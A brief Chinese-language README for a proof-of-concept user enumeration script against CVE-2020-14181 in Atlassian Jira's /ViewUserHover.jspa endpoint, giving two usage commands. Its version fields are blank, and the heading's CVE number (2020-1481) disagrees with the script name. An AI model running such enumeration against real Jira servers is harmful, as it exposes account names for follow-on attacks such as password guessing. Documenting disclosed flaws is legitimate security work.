受影响版本的 Atlassian Jira Server 和 Data Center 允许未认证用户通过 /ViewUserHover.jspa 端点中的信息泄露漏洞枚举用户。此漏洞由 Positive Technologies 的 Mikhail Klyuchnikov 发现。
受影响版本:
修复版本:
针对 CVE-2020-1481 的 PoC - Jira 用户名枚举器/验证器
用法:
python3 cve-2020-14181.py -u 'https://jira.domain.xyz' -w '/path/to/wordlist'
可选:写入到文件:
python3 cve-2020-14181.py -u 'https://jira.domain.xyz' -w '/path/to/wordlist' -o '/path/to/outfile'